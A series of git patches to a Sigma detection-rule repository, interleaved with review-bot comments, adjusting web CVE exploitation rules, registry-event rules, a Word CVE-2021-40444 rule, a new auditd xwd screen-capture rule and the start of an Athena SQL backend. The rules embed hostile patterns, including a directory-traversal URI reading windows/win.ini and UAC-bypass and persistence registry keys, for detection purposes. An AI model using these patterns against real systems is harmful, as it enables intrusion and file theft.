diff --git a/rules/web/web_cve-2010-2307_exploitation_attempt.yml b/rules/web/web_cve-2010-2307_exploitation_attempt.yml
index aa36c44e..91eeaa63 100644
--- a/rules/web/web_cve-2010-2307_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-2307_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-2307 Exploitation Attempt
-id: 5ca51722-d5ab-4fd2-8019-d86ab7c4ab06
+id: dd54adb6-05b1-40d6-a609-d5c8f3745853
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -10,6 +10,8 @@ description: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM
 (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-2682_exploitation_attempt.yml b/rules/web/web_cve-2010-2682_exploitation_attempt.yml
index e37ba64c..3f464d30 100644
--- a/rules/web/web_cve-2010-2682_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-2682_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-2682 Exploitation Attempt
-id: 9523ed0f-8d29-43d2-ba03-80021ca432e9
+id: 74bbe7ca-4136-46a2-a5fd-f521b0c773b3
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
 other impact via a .. (dot dot) in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-2861_exploitation_attempt.yml b/rules/web/web_cve-2010-2861_exploitation_attempt.yml
index 02c606e5..8477110d 100644
--- a/rules/web/web_cve-2010-2861_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-2861_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-2861 Exploitation Attempt
-id: fe01aa56-4e1f-4a9e-8a91-a54ecb03337e
+id: b7f12d62-4aa3-48aa-bfbf-5a12966ebed9
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -10,6 +10,8 @@ description: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI:Multiple directory travers
 and (5) enter.cfm in CFIDE/administrator/.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-2920_exploitation_attempt.yml b/rules/web/web_cve-2010-2920_exploitation_attempt.yml
index fcae4a86..32a850de 100644
--- a/rules/web/web_cve-2010-2920_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-2920_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-2920 Exploitation Attempt
-id: 06d7adfa-1797-499d-a070-afb10935ac16
+id: c4bdce4d-6a3c-4760-be05-a3bf923f7f0e
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion
 traversal sequences in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-3426_exploitation_attempt.yml b/rules/web/web_cve-2010-3426_exploitation_attempt.yml
index a5571a8d..69f3ca3f 100644
--- a/rules/web/web_cve-2010-3426_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-3426_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-3426 Exploitation Attempt
-id: 2cb7c37d-e5a6-4dee-a34f-7b96ea217d5b
+id: 4387e23a-0022-454e-8f9a-e2f19b97fbce
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion:Directo
 via a .. (dot dot) in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-4231_exploitation_attempt.yml b/rules/web/web_cve-2010-4231_exploitation_attempt.yml
index 216b3351..a04663df 100644
--- a/rules/web/web_cve-2010-4231_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-4231_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-4231 Exploitation Attempt
-id: dbf4c46f-5581-4cbd-8f31-7183bd7bc9eb
+id: 7f38b244-d9e1-4ad4-a4c2-326accaefbfd
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -8,6 +8,8 @@ description: Camtron CMNC-200 IP Camera - Directory Traversal:The CMNC-200 IP Ca
 directory transversal attacks, allowing access to any file on the camera file system.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-4617_exploitation_attempt.yml b/rules/web/web_cve-2010-4617_exploitation_attempt.yml
index 8664cee0..9cb15eca 100644
--- a/rules/web/web_cve-2010-4617_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-4617_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-4617 Exploitation Attempt
-id: 6e5bcbec-b693-4dc2-b093-38e07d0dd405
+id: 62a7a20d-34f2-4b54-962b-539f17723730
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component JotLoader 2.2.1 - Local File Inclusion:Directory
 section parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-5278_exploitation_attempt.yml b/rules/web/web_cve-2010-5278_exploitation_attempt.yml
index 9226d793..0e99c6b3 100644
--- a/rules/web/web_cve-2010-5278_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-5278_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-5278 Exploitation Attempt
-id: 88280398-c4a7-498f-9652-86d2448418d1
+id: a4a899e8-fd7a-49dd-b5a8-7044def72d61
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: MODx manager - Local File Inclusion:Directory traversal vulnerabili read arbitrary files via a .. (dot dot) in the class_key parameter. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve_2010_5278_exploitation_attempt.yml b/rules/web/web_cve_2010_5278_exploitation_attempt.yml deleted file mode 100644 index 3540cbf3..00000000 --- a/rules/web/web_cve_2010_5278_exploitation_attempt.yml +++ /dev/null @@ -1,24 +0,0 @@ -title: CVE-2010-5278 Joomla JaShowcase Exploitation Attempt -id: 55a72ccd-4f16-42a7-afc8-f7958035bf90 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php - in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, - allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key - parameter. -references: - - https://www.exploit-db.com/exploits/34788 - - https://www.cvedetails.com/cve/CVE-2010-5278 - - https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: '/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00' - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml index 702dcf29..79718f93 100644 --- a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml +++ b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml 
@@ -1,13 +1,13 @@ title: Powerup Write Hijack DLL id: 602a1f13-c640-4d73-b053-be9a2fa58b96 status: experimental -description: | +description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default). references: - https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/ -author: pbssubhash +author: Subhash Popuri (@pbssubhash) date: 2021/08/21 tags: - attack.persistence From 9576663789917e1353ff7360160cd73f39e3afe8 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 13 Sep 2021 15:23:38 +0700 Subject: [PATCH 0926/1367] Update web_cve_2021_40539_manageengine_adselfservice_exploit.yml Edit My Teammate --- .../web_cve_2021_40539_manageengine_adselfservice_exploit.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml b/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml index a0ff44c9..f678cfef 100644 --- a/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml +++ b/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml @@ -5,7 +5,7 @@ description: Detects an authentication bypass vulnerability affecting the REST A references: - https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/ - https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html -author: Sittikorn S, Nuttakorn L +author: Sittikorn S, Nuttakorn Tungpoonsup date: 2021/09/10 tags: - attack.initial_access From 7386904e42391429dd3ca93aaad004b9f9e328f4 Mon Sep 17 00:00:00 2001 
From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 13 Sep 2021 15:33:14 +0700 Subject: [PATCH 0927/1367] Update win_file_winword_cve_2021_40444.yml Add new condition --- .../file_event/win_file_winword_cve_2021_40444.yml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/rules/windows/file_event/win_file_winword_cve_2021_40444.yml b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml index 4eacdf8a..01d06076 100644 --- a/rules/windows/file_event/win_file_winword_cve_2021_40444.yml +++ b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml @@ -4,7 +4,8 @@ status: experimental description: Detects file creation patterns noticable during the exploitation of CVE-2021-40444 references: - https://twitter.com/RonnyTNL/status/1436334640617373699?s=20 -author: Florian Roth + - https://twitter.com/vanitasnk/status/1437329511142420483?s=21 +author: Florian Roth, Sittikorn S date: 2021/09/10 logsource: product: windows @@ -14,10 +15,14 @@ detection: Image: '\winword.exe' TargetFilename|endswith: '.cab' TargetFilename|contains: '\Windows\INetCache' - condition: selection + selection_inf: + Image: '\winword.exe' + TargetFilename|contains: + - '\AppData\Local\Temp\' + - '.inf' + condition: selection or selection_inf fields: - TargetFilename falsepositives: - unknown level: critical - From 5977596e65bb4ef8326484f6b0f2d42355aa802d Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 13 Sep 2021 16:05:22 +0700 Subject: [PATCH 0928/1367] Update win_file_winword_cve_2021_40444.yml --- rules/windows/file_event/win_file_winword_cve_2021_40444.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/win_file_winword_cve_2021_40444.yml b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml index 01d06076..77721735 100644 --- a/rules/windows/file_event/win_file_winword_cve_2021_40444.yml 
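Review bot: The new `selection_inf` block repeats `Image: '\winword.exe'` with no modifier, so as shown it is an exact match on the full image path and only fires if the logged Image were literally `\winword.exe`; the existing `selection` has the same form, so this may be an artefact of how the page was flattened, but if the file really has no modifier both selections should read `Image|endswith: '\winword.exe'`. The `TargetFilename|contains` list added here is an OR over `'\AppData\Local\Temp\'` and `'.inf'`, which the later patches in this series already tighten to `|contains|all`, so that part needs no further change.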
+++ b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml @@ -17,7 +17,7 @@ detection: TargetFilename|contains: '\Windows\INetCache' selection_inf: Image: '\winword.exe' - TargetFilename|contains: + TargetFilename|contains|all: - '\AppData\Local\Temp\' - '.inf' condition: selection or selection_inf From edd5c2745e7532047d610d000a60827901d77dda Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 13 Sep 2021 16:05:56 +0700 Subject: [PATCH 0929/1367] Update win_file_winword_cve_2021_40444.yml change TargetFilename|contains|all --- rules/windows/file_event/win_file_winword_cve_2021_40444.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/win_file_winword_cve_2021_40444.yml b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml index 77721735..1c20b1f8 100644 --- a/rules/windows/file_event/win_file_winword_cve_2021_40444.yml +++ b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml @@ -17,7 +17,7 @@ detection: TargetFilename|contains: '\Windows\INetCache' selection_inf: Image: '\winword.exe' - TargetFilename|contains|all: + TargetFilename|contains|all: - '\AppData\Local\Temp\' - '.inf' condition: selection or selection_inf From bd3b1323b4a04b551ecc6e78d8ff0fff6f26ff32 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 13 Sep 2021 12:45:10 +0200 Subject: [PATCH 0930/1367] fix TargetObject HKCU --- .../registry_event/registry_event_uac_bypass_eventvwr.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml b/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml index bdbd285e..01603e58 100755 --- a/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml +++ b/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml 
@@ -19,9 +19,9 @@ logsource:
 category: registry_event
 detection:
 methregistry:
- TargetObject|startswith: 'HKU\'
+ TargetObject|startswith: 'HKCU\'
 TargetObject|endswith: '\mscfile\shell\open\command'
 condition: methregistry
 falsepositives:
 - unknown
-level: critical
\ No newline at end of file
+level: critical
From 7b6ae81b8bae2d69ee80bea0a94a91cb7fd0fc67 Mon Sep 17 00:00:00 2001
From: frack113
Date: Mon, 13 Sep 2021 13:16:16 +0200
Subject: [PATCH 0931/1367] fix TargetObject HK
---
 rules/windows/registry_event/sysmon_apt_leviathan.yml | 4 ++--
 rules/windows/registry_event/sysmon_office_test_regadd.yml | 5 +++--
 rules/windows/registry_event/win_outlook_c2_registry_key.yml | 3 ++-
 rules/windows/registry_event/win_portproxy_registry_key.yml | 3 ++-
 4 files changed, 9 insertions(+), 6 deletions(-)
diff --git a/rules/windows/registry_event/sysmon_apt_leviathan.yml b/rules/windows/registry_event/sysmon_apt_leviathan.yml
index 9331bcc5..c3241918 100644
--- a/rules/windows/registry_event/sysmon_apt_leviathan.yml
+++ b/rules/windows/registry_event/sysmon_apt_leviathan.yml
@@ -10,12 +10,12 @@ tags:
 - attack.t1547.001
 author: Aidan Bracher
 date: 2020/07/07
-modified: 2020/09/06
+modified: 2021/09/13
 logsource:
 category: registry_event
 product: windows
 detection:
 selection:
- TargetObject: 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ntkd'
+ TargetObject: 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntkd'
 condition: selection
 level: critical
diff --git a/rules/windows/registry_event/sysmon_office_test_regadd.yml b/rules/windows/registry_event/sysmon_office_test_regadd.yml
index f8ec6212..601ba1c9 100644
--- a/rules/windows/registry_event/sysmon_office_test_regadd.yml
+++ b/rules/windows/registry_event/sysmon_office_test_regadd.yml
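Review bot: `TargetObject|startswith: 'HKCU\'` only matches if the log pipeline rewrites the hive, because Sysmon itself records per-user keys as `HKU\<SID>\...`, so against raw Sysmon registry events this prefix no longer matches where `HKU\` did. Unless the project's taxonomy defines HKCU as the canonical spelling that backends translate, the same concern applies to the `HKEY_CURRENT_USER` → `HKCU` rewrites in the sysmon_apt_leviathan, sysmon_office_test_regadd and win_outlook_c2_registry_key hunks and to `selection2` in the sysmon_apt_oceanlotus_registry hunk. A comment next to the selection stating which normalization the rule relies on, e.g. `# HKCU is the Sigma hive abbreviation; raw Sysmon writes HKU\<SID>\ - the backend/pipeline is expected to normalize`, would keep a later reader from reverting it.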
@@ -9,14 +9,15 @@ tags: - attack.persistence - attack.t1137.002 date: 2020/10/25 +modified: 2021/09/13 logsource: category: registry_event product: windows detection: selection_registry: TargetObject: - - 'HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf' - - 'HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf' + - 'HKCU\Software\Microsoft\Office test\Special\Perf' + - 'HKLM\Software\Microsoft\Office test\Special\Perf' condition: selection_registry falsepositives: - Unlikely diff --git a/rules/windows/registry_event/win_outlook_c2_registry_key.yml b/rules/windows/registry_event/win_outlook_c2_registry_key.yml index 4d652427..148886a9 100644 --- a/rules/windows/registry_event/win_outlook_c2_registry_key.yml +++ b/rules/windows/registry_event/win_outlook_c2_registry_key.yml @@ -12,12 +12,13 @@ tags: - attack.t1008 - attack.t1546 date: 2021/04/05 +modified: 2021/09/13 logsource: category: registry_event product: windows detection: selection_registry: - TargetObject: 'HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level' + TargetObject: 'HKCU\Software\Microsoft\Office\16.0\Outlook\Security\Level' Details|contains: '0x00000001' condition: selection_registry falsepositives: diff --git a/rules/windows/registry_event/win_portproxy_registry_key.yml b/rules/windows/registry_event/win_portproxy_registry_key.yml index 2559c620..dfea626f 100644 --- a/rules/windows/registry_event/win_portproxy_registry_key.yml +++ b/rules/windows/registry_event/win_portproxy_registry_key.yml @@ -7,6 +7,7 @@ references: - https://adepts.of0x.cc/netsh-portproxy-code/ - https://www.dfirnotes.net/portproxy_detection/ date: 2021/06/22 +modified: 2021/09/13 tags: - attack.lateral_movement - attack.defense_evasion 
@@ -18,7 +19,7 @@ logsource: product: windows detection: selection_registry: - TargetObject: 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp' + TargetObject: 'HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp' condition: selection_registry falsepositives: - WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723) From 047ebab36bd97a222164d1aa26ed180db3882b87 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 13 Sep 2021 14:01:39 +0200 Subject: [PATCH 0932/1367] fix HKCU --- .../registry_event/sysmon_apt_oceanlotus_registry.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/registry_event/sysmon_apt_oceanlotus_registry.yml b/rules/windows/registry_event/sysmon_apt_oceanlotus_registry.yml index 243d2d7e..d726d245 100755 --- a/rules/windows/registry_event/sysmon_apt_oceanlotus_registry.yml +++ b/rules/windows/registry_event/sysmon_apt_oceanlotus_registry.yml @@ -9,14 +9,14 @@ tags: - attack.t1112 author: megan201296, Jonhnathan Ribeiro date: 2019/04/14 -modified: 2020/09/06 +modified: 2021/09/13 logsource: category: registry_event product: windows detection: selection: TargetObject: - - 'HKCR\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model' + - 'HKCU\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model' TargetObject|endswith: # covers HKU\* and HKLM.. - '\SOFTWARE\App\AppXbf13d4ea2945444d8b13e2121cb6b663\Application' @@ -27,7 +27,7 @@ detection: - '\SOFTWARE\App\AppX37cc7fdccd644b4f85f4b22d5a3f105a\DefaultIcon' selection2: TargetObject|startswith: - - 'HKU\' + - 'HKCU\' TargetObject|contains: # HKCU\SOFTWARE\Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\ - '_Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\' From dd9921b3602c933d4fb060b2bfe73eed74096e44 Mon Sep 17 00:00:00 2001 
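Review bot: The first hunk changes `HKCR\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model` to `HKCU\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model`, which is a different key rather than a spelling normalization: HKCR is the merged view of `HKLM\Software\Classes` and `HKCU\Software\Classes`, so a per-user registration of that CLSID sits under `HKCU\Software\Classes\CLSID\...` (in raw Sysmon form `HKU\<SID>_Classes\CLSID\...`) and the new literal never matches. In the second hunk `selection2` switches from `HKU\` to `HKCU\` while the adjacent context comment still reads `# covers HKU\* and HKLM..` and the `contains` value `'_Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\'` is the `HKU\<SID>_Classes` form, so the prefix and the comment now disagree. Either keep `HKU\` here or update the comment to name the normalization the rule expects.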
From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 13 Sep 2021 19:41:01 +0700 Subject: [PATCH 0933/1367] Update win_file_winword_cve_2021_40444.yml Add modified date --- rules/windows/file_event/win_file_winword_cve_2021_40444.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/file_event/win_file_winword_cve_2021_40444.yml b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml index 1c20b1f8..2cb6e196 100644 --- a/rules/windows/file_event/win_file_winword_cve_2021_40444.yml +++ b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml @@ -7,6 +7,7 @@ references: - https://twitter.com/vanitasnk/status/1437329511142420483?s=21 author: Florian Roth, Sittikorn S date: 2021/09/10 +modified: 2021/09/13 logsource: product: windows category: file_event From a8f9617ccd25b52663015a57dd923c60535068db Mon Sep 17 00:00:00 2001 From: Pawel Mazur Date: Mon, 13 Sep 2021 18:56:33 +0200 Subject: [PATCH 0934/1367] New Rule - Linux - Auditd - Screen Capture with xwd --- .../auditd/lnx_auditd_screencaputre_xwd.yml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml diff --git a/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml b/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml new file mode 100644 index 00000000..ffffdae9 --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml 
@@ -0,0 +1,31 @@
+title: Screen Capture with xwd
+id: e2f17c5d-b02a-442b-9052-6eb89c9fec9c
+description: Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations
+author: 'Pawel Mazur'
+status: experimental
+date: 2021/09/13
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md
+ - https://attack.mitre.org/techniques/T1113/
+ - https://linux.die.net/man/1/xwd
+logsource:
+ product: linux
+ service: auditd
+detection:
+ xwd:
+ type: EXECVE
+ a0: xwd
+ xwd_root_window:
+ a1: '-root'
+ a2: '-out'
+ a3|endswith: '.xwd'
+ xwd_no_root_window:
+ a1: '-out'
+ a2|endswith: '.xwd'
+ condition: xwd and (xwd_root_window or xwd_no_root_window)
+tags:
+ - attack.collection
+ - attack.t1113
+falsepositives:
+ - Legitimate use of screenshot utility
+level: low
\ No newline at end of file
From e47a7d9826107d7c5a2c6320babc8bdd78664f67 Mon Sep 17 00:00:00 2001
From: zakibro <48967550+zakibro@users.noreply.github.com>
Date: Mon, 13 Sep 2021 19:08:23 +0200
Subject: [PATCH 0935/1367] Update lnx_auditd_screencaputre_xwd.yml
---
 rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml b/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml
index ffffdae9..0af916ba 100644
--- a/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml
+++ b/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml
@@ -1,4 +1,4 @@
-title: Screen Capture with xwd
+title: Screen Capture with Xwd
 id: e2f17c5d-b02a-442b-9052-6eb89c9fec9c
 description: Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations
 author: 'Pawel Mazur'
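Review bot: `a0: xwd` is an exact match on argv[0], and auditd EXECVE records normally carry a0 as the caller typed it, so an invocation by path (e.g. an `a0` value of `/usr/bin/xwd`) is missed; `a0|endswith: 'xwd'` covers both forms, and if that is judged too broad, listing the bare name and `'/xwd'` under `a0|endswith` keeps unrelated binaries out. The two option selections only recognise `-out` as the first or second argument, which is reasonable for a low-level rule but deserves a comment such as `# only -out as a1/a2 is matched; other argument orders are not covered`. The description also appears to be missing a word ("screen capture of a full with xwd"); the follow-up patch only touches the title and the trailing newline.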
@@ -28,4 +28,4 @@ tags:
 - attack.t1113
 falsepositives:
 - Legitimate use of screenshot utility
-level: low
\ No newline at end of file
+level: low
From 58d9e4180adcfc166dbf667d9d6ca24c660f24bb Mon Sep 17 00:00:00 2001
From: Mark McCurdy
Date: Mon, 13 Sep 2021 14:17:33 -0500
Subject: [PATCH 0936/1367] Correct for proper output to Splunk and CarbonBlack. Add AWS Athena config/backend support
---
 tools/config/athena.yml | 10 +
 tools/config/carbon-black-eedr.yml | 1 +
 tools/config/crowdstrike.yml | 14 ++
 tools/sigma/backends/athena.py | 304 ++++++++++++++++++++++++++++
 tools/sigma/backends/carbonblack.py | 1 +
 tools/sigma/backends/splunk.py | 4 +-
 6 files changed, 332 insertions(+), 2 deletions(-)
 create mode 100644 tools/config/athena.yml
 create mode 100644 tools/sigma/backends/athena.py
diff --git a/tools/config/athena.yml b/tools/config/athena.yml
new file mode 100644
index 00000000..601567f5
--- /dev/null
+++ b/tools/config/athena.yml
@@ -0,0 +1,10 @@
+title: AWS Athena
+order: 20
+backends:
+ - athena
+fieldmappings:
+ eventName: eventname
+ eventSource: eventsource
+ eventType: eventtype
+ userIdentity.type: useridentity.type
+ userIdentity.sessionContext.sessionIssuer.type: sessionissuer
diff --git a/tools/config/carbon-black-eedr.yml b/tools/config/carbon-black-eedr.yml
index 0e7c4fff..da98001d 100644
--- a/tools/config/carbon-black-eedr.yml
+++ b/tools/config/carbon-black-eedr.yml
@@ -31,6 +31,7 @@ fieldmappings:
 - netconn_ipv6
 DestinationPort: netconn_port
 Device: device_name
+ EventID: event_id
 FileName:
 - process_name
 - process_original_filename
diff --git a/tools/config/crowdstrike.yml b/tools/config/crowdstrike.yml
index 25309412..f1eb5593 100644
--- a/tools/config/crowdstrike.yml
+++ b/tools/config/crowdstrike.yml
@@ -16,4 +16,18 @@ fieldmappings: EventID: EventID CommandLine: Commandline Command_Line: Commandline + cmdline: Commandline Image: ImageFileName + TargetFilename: TargetFilename + TaskName: TaskName + Image: ImageFileName + image: ImageFileName + image_path: ImageFileName + OriginalFileName: ImageFileName + sha1: SHA1HashData + user: UserName + TaskName: TaskName + ParentImage: ParentBaseFileName + parent_image: ParentBaseFileName + ServiceName: ServiceName + TargetFilename: TargetFileName diff --git a/tools/sigma/backends/athena.py b/tools/sigma/backends/athena.py new file mode 100644 index 00000000..81957ac0 --- /dev/null +++ b/tools/sigma/backends/athena.py 
@@ -0,0 +1,304 @@ +# Output backends for sigmac +# Copyright 2019 Jayden Zheng +# Copyright 2020 Jonas Hagg +# Copyright 2021 wagga (https://github.com/wagga40/) + +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU Lesser General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. + +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Lesser General Public License for more details. + +# You should have received a copy of the GNU Lesser General Public License +# along with this program. If not, see . + +import re +import sigma +from sigma.backends.base import SingleTextQueryBackend +from sigma.parser.condition import SigmaAggregationParser, NodeSubexpression, ConditionAND, ConditionOR, ConditionNOT +from sigma.parser.exceptions import SigmaParseError +class SQLBackend(SingleTextQueryBackend): + """Converts Sigma rule into SQL query""" + identifier = "athena" + active = True + + andToken = " AND " # Token used for linking expressions with logical AND + orToken = " OR " # Same for OR + notToken = "NOT " # Same for NOT + subExpression = "(%s)" # Syntax for subexpressions, usually parenthesis around it. %s is inner expression + listExpression = "(%s)" # Syntax for lists, %s are list items separated with listSeparator + listSeparator = ", " # Character for separation of list items + valueExpression = "\'%s\'" # Expression of values, %s represents value + nullExpression = "-%s=*" # Expression of queries for null values or non-existing fields. %s is field name + notNullExpression = "%s=*" # Expression of queries for not null values. %s is field name + mapExpression = "%s = %s" # Syntax for field/value conditions. 
First %s is fieldname, second is value + mapMulti = "%s IN %s" # Syntax for field/value conditions. First %s is fieldname, second is value + mapWildcard = "%s LIKE %s ESCAPE \'\\\'"# Syntax for swapping wildcard conditions: Adding \ as escape character + mapSource = "%s=%s" # Syntax for sourcetype + mapListsSpecialHandling = False # Same handling for map items with list values as for normal values (strings, integers) if True, generateMapItemListNode method is called with node + mapListValueExpression = "%s OR %s" # Syntax for field/value condititons where map value is a list + mapLength = "(%s %s)" + + options = SingleTextQueryBackend.options + ( + ("table", "eventlog", "Use this option to specify table name.", None), + ("select", "*", "Use this option to specify fields you want to select. Example: \"--backend-option select=xxx,yyy\"", None), + ("selection", False, "Use this option to enable fields selection from Sigma rules.", None), + ) + + 